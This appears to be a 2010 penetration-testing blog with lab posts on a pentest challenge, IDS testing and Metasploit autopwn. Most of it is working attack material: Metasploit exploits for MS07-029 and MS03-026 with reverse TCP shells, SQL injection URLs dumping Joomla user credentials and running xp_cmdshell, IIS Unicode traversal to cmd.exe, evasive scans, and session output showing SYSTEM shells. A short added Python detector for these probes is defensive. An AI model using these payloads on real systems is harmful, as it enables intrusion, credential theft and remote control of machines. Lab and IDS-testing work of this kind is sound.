Tuesday, November 23, 2010

PenTest Challenge (131.107.1.250)

Solutions

1. MS-DNS RPC Vulnerability (MS07-029)

msf > use windows/dcerpc/ms07_029_msdns_zonename
msf exploit(ms07_029_msdns_zonename) > set RHOST 131.107.1.250
RHOST => 131.107.1.250
msf exploit(ms07_029_msdns_zonename) > set LHOST 131.107.1.252
LHOST => 131.107.1.252
msf exploit(ms07_029_msdns_zonename) > set LPORT 443
LPORT => 443
msf exploit(ms07_029_msdns_zonename) > set TARGET 0
TARGET => 0
msf exploit(ms07_029_msdns_zonename) > exploit

2. SQL Injection Vulnerability in Joomla Component (Amblog)

Link: http://www.exploit-db.com/exploits/14596/

http://131.107.1.250/joomla/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version

http://131.107.1.250/joomla/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users

Monday, November 22, 2010

IDS Testing (Samples)

Lab hosts:
TEST-BT4 = 131.107.1.252
DEN-WEB1 = 131.107.1.101
DEN-WEB2 = 131.107.1.254
LON-IDS1 = 131.107.1.126

From TEST-BT4, launch these commands:

Anomaly Test
ping -s 65000 131.107.1.254

Port Scan Tests
nmap -sS 131.107.1.254
hping2 --scan 80,135,443,445 -S 131.107.1.254

Web Attack Tests
http://131.107.1.254/robots.txt
http://131.107.1.126/robots.txt

http://131.107.1.254/.htaccess
http://131.107.1.126/.htaccess

IIS Unicode Directory Traversal Attack Tests
http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

MS-SQL Injection Tests
http://131.107.1.101/index.asp?newscode=1'
http://131.107.1.101/index.asp?newscode=1 having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid having 1=1 --
http://131.107.1.101/index.asp?newscode=1 group by newsid,newsdesc having 1=1 --
http://131.107.1.101/index.asp?newscode=1;update newstable1 set newsdesc='HACKED!' where newsid=1;--
http://131.107.1.101/index.asp?newscode=1;exec master..xp_cmdshell 'dir c:\';--

Exploit Test
cd /pentest/exploits/framework3
./msfconsole

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set RHOST 131.107.1.254
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Evading IDS Detection using Slow/Sneaky Scan Test
nmap -sS -PN -p80,443 -T1 131.107.1.254
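As an added example (not part of the original post), a small Python log scanner that flags the IIS Unicode traversal and MS-SQL injection probes from the tests above in constructed access-log lines; it fully percent-decodes each request path before matching, because the `%255c` form only hides the backslash from a single-pass decoder.

```python
# Added detection example for the IDS test requests above; not part of the
# original post. The access-log lines below are constructed.
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format).
SAMPLE_LOG = """\
131.107.1.252 - - [22/Nov/2010:10:01:02 +0000] "GET /index.asp?newscode=1 HTTP/1.1" 200 512
131.107.1.252 - - [22/Nov/2010:10:01:05 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0" 200 2048
131.107.1.252 - - [22/Nov/2010:10:01:09 +0000] "GET /index.asp?newscode=1%20having%201=1%20-- HTTP/1.1" 500 301
131.107.1.252 - - [22/Nov/2010:10:01:12 +0000] "GET /index.asp?newscode=1;exec%20master..xp_cmdshell%20'dir%20c:\\';-- HTTP/1.1" 500 301
131.107.1.252 - - [22/Nov/2010:10:01:15 +0000] "GET /robots.txt HTTP/1.1" 404 210
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')

# Signatures are matched against the fully decoded path, so the
# double-encoded backslash (%255c -> %5c -> \) cannot slip past them.
SIGNATURES = {
    "iis-unicode-traversal": re.compile(r"\.\.[\\/].*(cmd\.exe|winnt)", re.I),
    "mssql-injection": re.compile(r"(having\s+1=1|xp_cmdshell|;\s*(update|exec)\b)", re.I),
}

def decode_fully(path: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded to `rounds`)."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (signature_name, decoded_path) for each request that matches."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = decode_fully(m.group("path"))
        for name, pattern in SIGNATURES.items():
            if pattern.search(path):
                hits.append((name, path))
    return hits

if __name__ == "__main__":
    for name, path in scan_log(SAMPLE_LOG):
        print(f"{name}: {path}")
```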

Monday, November 15, 2010

Metasploit Autopwn with Nessus

Use SQLite3 database driver
msf > db_driver sqlite3

Create "pentest" database
msf > db_create pentest

Import Nessus scan result
msf > db_import /tmp/131_107_1_101_scan.nessus

Display matching exploit modules
msf > db_autopwn -t -x

Launch matching exploits
msf > db_autopwn -e -x -r

Display open sessions
msf > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:34013 -> 131.107.1.101:1063
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:14816 -> 131.107.1.101:1064
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:20971 -> 131.107.1.101:1065
4 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ DEN-WEB1 131.107.1.252:5517 -> 131.107.1.101:1066
5 meterpreter x86/win32 DEN-WEB1\IUSR_MICROSOF-3UK0WZ @ DEN-WEB1 131.107.1.252:8837 -> 131.107.1.101:1068

msf > sessions -l

msf > sessions -i 1